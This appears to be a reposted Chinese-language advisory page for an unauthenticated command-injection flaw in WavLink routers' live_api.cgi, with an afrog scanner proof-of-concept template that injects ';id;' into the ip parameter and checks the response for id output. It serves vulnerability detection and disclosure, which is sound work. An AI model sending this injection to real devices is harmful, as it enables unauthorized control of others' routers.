WavLink Router Live API cgi RCE

漏洞信息

漏洞名称: WavLink Router Live API cgi RCE

漏洞类型: 命令执行

漏洞等级: 高危

漏洞描述: 该漏洞存在于WavLink路由器的Live API cgi组件中,允许攻击者通过构造特定的GET请求执行任意命令。WavLink路由器是一种常见的网络设备,广泛用于家庭和小型企业网络环境中,提供网络连接和管理功能。漏洞的根源在于Live API cgi组件对用户输入的验证不足,攻击者可以通过在请求中插入恶意命令来利用此漏洞。由于该漏洞允许远程命令执行,攻击者可以完全控制受影响的设备,执行任意代码,可能导致数据泄露、服务中断或其他恶意活动。此漏洞的利用不需要身份验证,且可以自动化利用,因此对受影响设备构成了严重的安全威胁。

产品厂商: WavLink

产品名称: WavLink Router

来源: https://github.com/zan8in/afrog/blob/89bfabcff982e1109bcaa6ece0d23f5105497a67/pocs%2Fafrog-pocs%2Fvulnerability%2Fwavlink-router-live-api-cgi-rce.yaml

类型: zan8in/afrog:github commit

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

id: wavlink-router-live-api-cgi-rce

info:
name: WavLink Router Live API cgi RCE
author: 熊猫也是猫
severity: high
verified: true
tags: wavlink,rce
created: 2023/12/28

rules:
r0:
request:
method: GET
path: /cgi-bin/live_api.cgi?page=abc&id=173&ip=;id;
expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0()



WavLink Router Live API cgi RCE
http://example.com/2025/07/30/github_2693633088/
作者
lianccc
发布于
2025年7月30日
许可协议